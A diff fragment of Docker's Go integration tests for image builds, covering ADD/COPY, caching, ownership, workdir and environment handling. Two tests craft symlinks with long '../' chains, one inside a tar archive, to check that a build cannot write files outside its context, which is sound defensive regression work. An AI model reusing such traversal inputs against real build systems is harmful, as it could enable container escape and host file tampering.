buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatalf("should have built: %q", err) + } +} + +func (s *DockerSuite) TestBuildCopyWildcardCache(c *check.C) { + name := "testcopywildcardcache" + ctx, err := fakeContext(`FROM busybox + COPY file1.txt /tmp/`, + map[string]string{ + "file1.txt": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + + // Now make sure we use a cache the 2nd time even with wild cards. + // Use the same context so the file is the same and the checksum will match + ctx.Add("Dockerfile", `FROM busybox + COPY file*.txt /tmp/`) + + id2, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + + if id1 != id2 { + c.Fatal("didn't use the cache") + } + +} + +func (s *DockerSuite) TestBuildAddSingleFileToNonExistingDir(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testaddsinglefiletononexistingdir" + ctx, err := fakeContext(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN touch /exists +RUN chown dockerio.dockerio /exists +ADD test_file /test_dir/ +RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, + map[string]string{ + "test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + +} + +func (s *DockerSuite) TestBuildAddDirContentToRoot(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testadddircontenttoroot" + ctx, err := fakeContext(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN touch /exists +RUN chown dockerio.dockerio exists +ADD test_dir / +RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, + map[string]string{ + "test_dir/test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildAddDirContentToExistingDir(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testadddircontenttoexistingdir" + ctx, err := fakeContext(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN mkdir /exists +RUN touch /exists/exists_file +RUN chown -R dockerio.dockerio /exists +ADD test_dir/ /exists/ +RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ] +RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ] +RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]`, + map[string]string{ + "test_dir/test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildAddWholeDirToRoot(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testaddwholedirtoroot" + ctx, err := fakeContext(fmt.Sprintf(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN touch /exists +RUN chown dockerio.dockerio exists +ADD test_dir /test_dir +RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l / | grep test_dir | awk '{print $1}') = 'drwxr-xr-x' ] +RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /test_dir/test_file | awk '{print $1}') = '%s' ] +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod), + map[string]string{ + "test_dir/test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +// Testing #5941 +func (s *DockerSuite) TestBuildAddEtcToRoot(c *check.C) { + name := "testaddetctoroot" + + ctx, err := fakeContext(`FROM `+minimalBaseImage()+` +ADD . /`, + map[string]string{ + "etc/test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +// Testing #9401 +func (s *DockerSuite) TestBuildAddPreservesFilesSpecialBits(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testaddpreservesfilesspecialbits" + ctx, err := fakeContext(`FROM busybox +ADD suidbin /usr/bin/suidbin +RUN chmod 4755 /usr/bin/suidbin +RUN [ $(ls -l /usr/bin/suidbin | awk '{print $1}') = '-rwsr-xr-x' ] +ADD ./data/ / +RUN [ $(ls -l /usr/bin/suidbin | awk '{print $1}') = '-rwsr-xr-x' ]`, + map[string]string{ + "suidbin": "suidbin", + "/data/usr/test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildCopySingleFileToRoot(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testcopysinglefiletoroot" + ctx, err := fakeContext(fmt.Sprintf(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN touch /exists +RUN chown dockerio.dockerio /exists +COPY test_file / +RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /test_file | awk '{print $1}') = '%s' ] +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod), + map[string]string{ + "test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +// Issue #3960: "ADD src ." hangs - adapted for COPY +func (s *DockerSuite) TestBuildCopySingleFileToWorkdir(c *check.C) { + name := "testcopysinglefiletoworkdir" + ctx, err := fakeContext(`FROM busybox +COPY test_file .`, + map[string]string{ + "test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + errChan := make(chan error) + go func() { + _, err := buildImageFromContext(name, ctx, true) + errChan <- err + close(errChan) + }() + select { + case <-time.After(15 * time.Second): + c.Fatal("Build with adding to workdir timed out") + case err := <-errChan: + c.Assert(err, check.IsNil) + } +} + +func (s *DockerSuite) TestBuildCopySingleFileToExistDir(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testcopysinglefiletoexistdir" + ctx, err := fakeContext(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN mkdir /exists +RUN touch /exists/exists_file +RUN chown -R dockerio.dockerio /exists +COPY test_file /exists/ +RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ] +RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, + map[string]string{ + "test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildCopySingleFileToNonExistDir(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testcopysinglefiletononexistdir" + ctx, err := fakeContext(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN touch /exists +RUN chown dockerio.dockerio /exists +COPY test_file /test_dir/ +RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, + map[string]string{ + "test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildCopyDirContentToRoot(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testcopydircontenttoroot" + ctx, err := fakeContext(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN touch /exists +RUN chown dockerio.dockerio exists +COPY test_dir / +RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, + map[string]string{ + "test_dir/test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildCopyDirContentToExistDir(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testcopydircontenttoexistdir" + ctx, err := fakeContext(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN mkdir /exists +RUN touch /exists/exists_file +RUN chown -R dockerio.dockerio /exists +COPY test_dir/ /exists/ +RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ] +RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ] +RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]`, + map[string]string{ + "test_dir/test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildCopyWholeDirToRoot(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testcopywholedirtoroot" + ctx, err := fakeContext(fmt.Sprintf(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN touch /exists +RUN chown dockerio.dockerio exists +COPY test_dir /test_dir +RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l / | grep test_dir | awk '{print $1}') = 'drwxr-xr-x' ] +RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /test_dir/test_file | awk '{print $1}') = '%s' ] +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod), + map[string]string{ + "test_dir/test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildCopyEtcToRoot(c *check.C) { + name := "testcopyetctoroot" + + ctx, err := fakeContext(`FROM `+minimalBaseImage()+` +COPY . /`, + map[string]string{ + "etc/test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildAddBadLinks(c *check.C) { + testRequires(c, DaemonIsLinux) // Not currently working on Windows + + dockerfile := ` + FROM scratch + ADD links.tar / + ADD foo.txt /symlink/ + ` + targetFile := "foo.txt" + var ( + name = "test-link-absolute" + ) + ctx, err := fakeContext(dockerfile, nil) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + tempDir, err := ioutil.TempDir("", "test-link-absolute-temp-") + if err != nil { + c.Fatalf("failed to create temporary directory: %s", tempDir) + } + defer os.RemoveAll(tempDir) + + var symlinkTarget string + if runtime.GOOS == "windows" { + var driveLetter string + if abs, err := filepath.Abs(tempDir); err != nil { + c.Fatal(err) + } else { + driveLetter = abs[:1] + } + tempDirWithoutDrive := tempDir[2:] + symlinkTarget = fmt.Sprintf(`%s:\..\..\..\..\..\..\..\..\..\..\..\..%s`, driveLetter, tempDirWithoutDrive) + } else { + symlinkTarget = fmt.Sprintf("/../../../../../../../../../../../..%s", tempDir) + } + + tarPath := filepath.Join(ctx.Dir, "links.tar") + nonExistingFile := filepath.Join(tempDir, targetFile) + fooPath := filepath.Join(ctx.Dir, targetFile) + + tarOut, err := os.Create(tarPath) + if err != nil { + c.Fatal(err) + } + + tarWriter := tar.NewWriter(tarOut) + + header := &tar.Header{ + Name: "symlink", + Typeflag: tar.TypeSymlink, + Linkname: symlinkTarget, + Mode: 0755, + Uid: 0, + Gid: 0, + } + + err = tarWriter.WriteHeader(header) + if err != nil { + c.Fatal(err) + } + + tarWriter.Close() + tarOut.Close() + + foo, err := os.Create(fooPath) + if err != nil { + c.Fatal(err) + } + defer foo.Close() + + if _, err := foo.WriteString("test"); err != nil { + c.Fatal(err) + } + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + + if _, err := os.Stat(nonExistingFile); err == nil || err != nil && !os.IsNotExist(err) { + c.Fatalf("%s shouldn't have been written and it shouldn't exist", nonExistingFile) + } + +} + +func (s *DockerSuite) TestBuildAddBadLinksVolume(c *check.C) { + testRequires(c, DaemonIsLinux) // ln not implemented on Windows busybox + const ( + dockerfileTemplate = ` + FROM busybox + RUN ln -s /../../../../../../../../%s /x + VOLUME /x + ADD foo.txt /x/` + targetFile = "foo.txt" + ) + var ( + name = "test-link-absolute-volume" + dockerfile = "" + ) + + tempDir, err := ioutil.TempDir("", "test-link-absolute-volume-temp-") + if err != nil { + c.Fatalf("failed to create temporary directory: %s", tempDir) + } + defer os.RemoveAll(tempDir) + + dockerfile = fmt.Sprintf(dockerfileTemplate, tempDir) + nonExistingFile := filepath.Join(tempDir, targetFile) + + ctx, err := fakeContext(dockerfile, nil) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + fooPath := filepath.Join(ctx.Dir, targetFile) + + foo, err := os.Create(fooPath) + if err != nil { + c.Fatal(err) + } + defer foo.Close() + + if _, err := foo.WriteString("test"); err != nil { + c.Fatal(err) + } + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + + if _, err := os.Stat(nonExistingFile); err == nil || err != nil && !os.IsNotExist(err) { + c.Fatalf("%s shouldn't have been written and it shouldn't exist", nonExistingFile) + } + +} + +// Issue #5270 - ensure we throw a better error than "unexpected EOF" +// when we can't access files in the context. +func (s *DockerSuite) TestBuildWithInaccessibleFilesInContext(c *check.C) { + testRequires(c, DaemonIsLinux, UnixCli) // test uses chown/chmod: not available on windows + + { + name := "testbuildinaccessiblefiles" + ctx, err := fakeContext("FROM scratch\nADD . /foo/", map[string]string{"fileWithoutReadAccess": "foo"}) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + // This is used to ensure we detect inaccessible files early during build in the cli client + pathToFileWithoutReadAccess := filepath.Join(ctx.Dir, "fileWithoutReadAccess") + + if err = os.Chown(pathToFileWithoutReadAccess, 0, 0); err != nil { + c.Fatalf("failed to chown file to root: %s", err) + } + if err = os.Chmod(pathToFileWithoutReadAccess, 0700); err != nil { + c.Fatalf("failed to chmod file to 700: %s", err) + } + buildCmd := exec.Command("su", "unprivilegeduser", "-c", fmt.Sprintf("%s build -t %s .", dockerBinary, name)) + buildCmd.Dir = ctx.Dir + out, _, err := runCommandWithOutput(buildCmd) + if err == nil { + c.Fatalf("build should have failed: %s %s", err, out) + } + + // check if we've detected the failure before we started building + if !strings.Contains(out, "no permission to read from ") { + c.Fatalf("output should've contained the string: no permission to read from but contained: %s", out) + } + + if !strings.Contains(out, "Error checking context") { + c.Fatalf("output should've contained the string: Error checking context") + } + } + { + name := "testbuildinaccessibledirectory" + ctx, err := fakeContext("FROM scratch\nADD . /foo/", map[string]string{"directoryWeCantStat/bar": "foo"}) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + // This is used to ensure we detect inaccessible directories early during build in the cli client + pathToDirectoryWithoutReadAccess := filepath.Join(ctx.Dir, "directoryWeCantStat") + pathToFileInDirectoryWithoutReadAccess := filepath.Join(pathToDirectoryWithoutReadAccess, "bar") + + if err = os.Chown(pathToDirectoryWithoutReadAccess, 0, 0); err != nil { + c.Fatalf("failed to chown directory to root: %s", err) + } + if err = os.Chmod(pathToDirectoryWithoutReadAccess, 0444); err != nil { + c.Fatalf("failed to chmod directory to 444: %s", err) + } + if err = os.Chmod(pathToFileInDirectoryWithoutReadAccess, 0700); err != nil { + c.Fatalf("failed to chmod file to 700: %s", err) + } + + buildCmd := exec.Command("su", "unprivilegeduser", "-c", fmt.Sprintf("%s build -t %s .", dockerBinary, name)) + buildCmd.Dir = ctx.Dir + out, _, err := runCommandWithOutput(buildCmd) + if err == nil { + c.Fatalf("build should have failed: %s %s", err, out) + } + + // check if we've detected the failure before we started building + if !strings.Contains(out, "can't stat") { + c.Fatalf("output should've contained the string: can't access %s", out) + } + + if !strings.Contains(out, "Error checking context") { + c.Fatalf("output should've contained the string: Error checking context\ngot:%s", out) + } + + } + { + name := "testlinksok" + ctx, err := fakeContext("FROM scratch\nADD . /foo/", nil) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + target := "../../../../../../../../../../../../../../../../../../../azA" + if err := os.Symlink(filepath.Join(ctx.Dir, "g"), target); err != nil { + c.Fatal(err) + } + defer os.Remove(target) + // This is used to ensure we don't follow links when checking if everything in the context is accessible + // This test doesn't require that we run commands as an unprivileged user + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + } + { + name := "testbuildignoredinaccessible" + ctx, err := fakeContext("FROM scratch\nADD . /foo/", + map[string]string{ + "directoryWeCantStat/bar": "foo", + ".dockerignore": "directoryWeCantStat", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + // This is used to ensure we don't try to add inaccessible files when they are ignored by a .dockerignore pattern + pathToDirectoryWithoutReadAccess := filepath.Join(ctx.Dir, "directoryWeCantStat") + pathToFileInDirectoryWithoutReadAccess := filepath.Join(pathToDirectoryWithoutReadAccess, "bar") + if err = os.Chown(pathToDirectoryWithoutReadAccess, 0, 0); err != nil { + c.Fatalf("failed to chown directory to root: %s", err) + } + if err = os.Chmod(pathToDirectoryWithoutReadAccess, 0444); err != nil { + c.Fatalf("failed to chmod directory to 444: %s", err) + } + if err = os.Chmod(pathToFileInDirectoryWithoutReadAccess, 0700); err != nil { + c.Fatalf("failed to chmod file to 700: %s", err) + } + + result := icmd.RunCmd(icmd.Cmd{ + Dir: ctx.Dir, + Command: []string{"su", "unprivilegeduser", "-c", + fmt.Sprintf("%s build -t %s .", dockerBinary, name)}, + }) + result.Assert(c, icmd.Expected{}) + } +} + +func (s *DockerSuite) TestBuildForceRm(c *check.C) { + containerCountBefore, err := getContainerCount() + if err != nil { + c.Fatalf("failed to get the container count: %s", err) + } + name := "testbuildforcerm" + + ctx, err := fakeContext(`FROM `+minimalBaseImage()+` + RUN true + RUN thiswillfail`, nil) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + dockerCmdInDir(c, ctx.Dir, "build", "-t", name, "--force-rm", ".") + + containerCountAfter, err := getContainerCount() + if err != nil { + c.Fatalf("failed to get the container count: %s", err) + } + + if containerCountBefore != containerCountAfter { + c.Fatalf("--force-rm shouldn't have left containers behind") + } + +} + +func (s *DockerSuite) TestBuildRm(c *check.C) { + name := "testbuildrm" + + ctx, err := fakeContext(`FROM `+minimalBaseImage()+` + ADD foo / + ADD foo /`, map[string]string{"foo": "bar"}) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + { + containerCountBefore, err := getContainerCount() + if err != nil { + c.Fatalf("failed to get the container count: %s", err) + } + + out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "--rm", "-t", name, ".") + + if err != nil { + c.Fatal("failed to build the image", out) + } + + containerCountAfter, err := getContainerCount() + if err != nil { + c.Fatalf("failed to get the container count: %s", err) + } + + if containerCountBefore != containerCountAfter { + c.Fatalf("-rm shouldn't have left containers behind") + } + deleteImages(name) + } + + { + containerCountBefore, err := getContainerCount() + if err != nil { + c.Fatalf("failed to get the container count: %s", err) + } + + out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", name, ".") + + if err != nil { + c.Fatal("failed to build the image", out) + } + + containerCountAfter, err := getContainerCount() + if err != nil { + c.Fatalf("failed to get the container count: %s", err) + } + + if containerCountBefore != containerCountAfter { + c.Fatalf("--rm shouldn't have left containers behind") + } + deleteImages(name) + } + + { + containerCountBefore, err := getContainerCount() + if err != nil { + c.Fatalf("failed to get the container count: %s", err) + } + + out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "--rm=false", "-t", name, ".") + + if err != nil { + c.Fatal("failed to build the image", out) + } + + containerCountAfter, err := getContainerCount() + if err != nil { + c.Fatalf("failed to get the container count: %s", err) + } + + if containerCountBefore == containerCountAfter { + c.Fatalf("--rm=false should have left containers behind") + } + deleteImages(name) + + } + +} + +func (s *DockerSuite) TestBuildWithVolumes(c *check.C) { + testRequires(c, DaemonIsLinux) // Invalid volume paths on Windows + var ( + result map[string]map[string]struct{} + name = "testbuildvolumes" + emptyMap = make(map[string]struct{}) + expected = map[string]map[string]struct{}{ + "/test1": emptyMap, + "/test2": emptyMap, + "/test3": emptyMap, + "/test4": emptyMap, + "/test5": emptyMap, + "/test6": emptyMap, + "[/test7": emptyMap, + "/test8]": emptyMap, + } + ) + _, err := buildImage(name, + `FROM scratch + VOLUME /test1 + VOLUME /test2 + VOLUME /test3 /test4 + VOLUME ["/test5", "/test6"] + VOLUME [/test7 /test8] + `, + true) + if err != nil { + c.Fatal(err) + } + res := inspectFieldJSON(c, name, "Config.Volumes") + + err = json.Unmarshal([]byte(res), &result) + if err != nil { + c.Fatal(err) + } + + equal := reflect.DeepEqual(&result, &expected) + + if !equal { + c.Fatalf("Volumes %s, expected %s", result, expected) + } + +} + +func (s *DockerSuite) TestBuildMaintainer(c *check.C) { + name := "testbuildmaintainer" + + expected := "dockerio" + _, err := buildImage(name, + `FROM `+minimalBaseImage()+` + MAINTAINER dockerio`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Author") + if res != expected { + c.Fatalf("Maintainer %s, expected %s", res, expected) + } +} + +func (s *DockerSuite) TestBuildUser(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuilduser" + expected := "dockerio" + _, err := buildImage(name, + `FROM busybox + RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd + USER dockerio + RUN [ $(whoami) = 'dockerio' ]`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.User") + if res != expected { + c.Fatalf("User %s, expected %s", res, expected) + } +} + +func (s *DockerSuite) TestBuildRelativeWorkdir(c *check.C) { + name := "testbuildrelativeworkdir" + + var ( + expected1 string + expected2 string + expected3 string + expected4 string + expectedFinal string + ) + + if daemonPlatform == "windows" { + expected1 = `C:/` + expected2 = `C:/test1` + expected3 = `C:/test2` + expected4 = `C:/test2/test3` + expectedFinal = `C:\test2\test3` // Note inspect is going to return Windows paths, as it's not in busybox + } else { + expected1 = `/` + expected2 = `/test1` + expected3 = `/test2` + expected4 = `/test2/test3` + expectedFinal = `/test2/test3` + } + + _, err := buildImage(name, + `FROM busybox + RUN sh -c "[ "$PWD" = "`+expected1+`" ]" + WORKDIR test1 + RUN sh -c "[ "$PWD" = "`+expected2+`" ]" + WORKDIR /test2 + RUN sh -c "[ "$PWD" = "`+expected3+`" ]" + WORKDIR test3 + RUN sh -c "[ "$PWD" = "`+expected4+`" ]"`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.WorkingDir") + if res != expectedFinal { + c.Fatalf("Workdir %s, expected %s", res, expectedFinal) + } +} + +// #22181 Regression test. Single end-to-end test of using +// Windows semantics. Most path handling verifications are in unit tests +func (s *DockerSuite) TestBuildWindowsWorkdirProcessing(c *check.C) { + testRequires(c, DaemonIsWindows) + name := "testbuildwindowsworkdirprocessing" + _, err := buildImage(name, + `FROM busybox + WORKDIR C:\\foo + WORKDIR bar + RUN sh -c "[ "$PWD" = "C:/foo/bar" ]" + `, + true) + if err != nil { + c.Fatal(err) + } +} + +// #22181 Regression test. Most paths handling verifications are in unit test. +// One functional test for end-to-end +func (s *DockerSuite) TestBuildWindowsAddCopyPathProcessing(c *check.C) { + testRequires(c, DaemonIsWindows) + name := "testbuildwindowsaddcopypathprocessing" + // TODO Windows (@jhowardmsft). Needs a follow-up PR to 22181 to + // support backslash such as .\\ being equivalent to ./ and c:\\ being + // equivalent to c:/. This is not currently (nor ever has been) supported + // by docker on the Windows platform. + dockerfile := ` + FROM busybox + # No trailing slash on COPY/ADD + # Results in dir being changed to a file + WORKDIR /wc1 + COPY wc1 c:/wc1 + WORKDIR /wc2 + ADD wc2 c:/wc2 + WORKDIR c:/ + RUN sh -c "[ $(cat c:/wc1/wc1) = 'hellowc1' ]" + RUN sh -c "[ $(cat c:/wc2/wc2) = 'worldwc2' ]" + + # Trailing slash on COPY/ADD, Windows-style path. + WORKDIR /wd1 + COPY wd1 c:/wd1/ + WORKDIR /wd2 + ADD wd2 c:/wd2/ + RUN sh -c "[ $(cat c:/wd1/wd1) = 'hellowd1' ]" + RUN sh -c "[ $(cat c:/wd2/wd2) = 'worldwd2' ]" + ` + ctx, err := fakeContext(dockerfile, map[string]string{ + "wc1": "hellowc1", + "wc2": "worldwc2", + "wd1": "hellowd1", + "wd2": "worldwd2", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + _, err = buildImageFromContext(name, ctx, false) + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildWorkdirWithEnvVariables(c *check.C) { + name := "testbuildworkdirwithenvvariables" + + var expected string + if daemonPlatform == "windows" { + expected = `C:\test1\test2` + } else { + expected = `/test1/test2` + } + + _, err := buildImage(name, + `FROM busybox + ENV DIRPATH /test1 + ENV SUBDIRNAME test2 + WORKDIR $DIRPATH + WORKDIR $SUBDIRNAME/$MISSING_VAR`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.WorkingDir") + if res != expected { + c.Fatalf("Workdir %s, expected %s", res, expected) + } +} + +func (s *DockerSuite) TestBuildRelativeCopy(c *check.C) { + // cat /test1/test2/foo gets permission denied for the user + testRequires(c, NotUserNamespace) + + var expected string + if daemonPlatform == "windows" { + expected = `C:/test1/test2` + } else { + expected = `/test1/test2` + } + + name := "testbuildrelativecopy" + dockerfile := ` + FROM busybox + WORKDIR /test1 + WORKDIR test2 + RUN sh -c "[ "$PWD" = '` + expected + `' ]" + COPY foo ./ + RUN sh -c "[ $(cat /test1/test2/foo) = 'hello' ]" + ADD foo ./bar/baz + RUN sh -c "[ $(cat /test1/test2/bar/baz) = 'hello' ]" + COPY foo ./bar/baz2 + RUN sh -c "[ $(cat /test1/test2/bar/baz2) = 'hello' ]" + WORKDIR .. + COPY foo ./ + RUN sh -c "[ $(cat /test1/foo) = 'hello' ]" + COPY foo /test3/ + RUN sh -c "[ $(cat /test3/foo) = 'hello' ]" + WORKDIR /test4 + COPY . . + RUN sh -c "[ $(cat /test4/foo) = 'hello' ]" + WORKDIR /test5/test6 + COPY foo ../ + RUN sh -c "[ $(cat /test5/foo) = 'hello' ]" + ` + ctx, err := fakeContext(dockerfile, map[string]string{ + "foo": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + _, err = buildImageFromContext(name, ctx, false) + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildBlankName(c *check.C) { + name := "testbuildblankname" + _, _, stderr, err := buildImageWithStdoutStderr(name, + `FROM busybox + ENV =`, + true) + if err == nil { + c.Fatal("Build was supposed to fail but didn't") + } + if !strings.Contains(stderr, "ENV names can not be blank") { + c.Fatalf("Missing error message, got: %s", stderr) + } + + _, _, stderr, err = buildImageWithStdoutStderr(name, + `FROM busybox + LABEL =`, + true) + if err == nil { + c.Fatal("Build was supposed to fail but didn't") + } + if !strings.Contains(stderr, "LABEL names can not be blank") { + c.Fatalf("Missing error message, got: %s", stderr) + } + + _, _, stderr, err = buildImageWithStdoutStderr(name, + `FROM busybox + ARG =foo`, + true) + if err == nil { + c.Fatal("Build was supposed to fail but didn't") + } + if !strings.Contains(stderr, "ARG names can not be blank") { + c.Fatalf("Missing error message, got: %s", stderr) + } +} + +func (s *DockerSuite) TestBuildEnv(c *check.C) { + testRequires(c, DaemonIsLinux) // ENV expansion is different in Windows + name := "testbuildenv" + expected := "[PATH=/test:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin PORT=2375]" + _, err := buildImage(name, + `FROM busybox + ENV PATH /test:$PATH + ENV PORT 2375 + RUN [ $(env | grep PORT) = 'PORT=2375' ]`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.Env") + if res != expected { + c.Fatalf("Env %s, expected %s", res, expected) + } +} + +func (s *DockerSuite) TestBuildPATH(c *check.C) { + testRequires(c, DaemonIsLinux) // ENV expansion is different in Windows + + defPath := 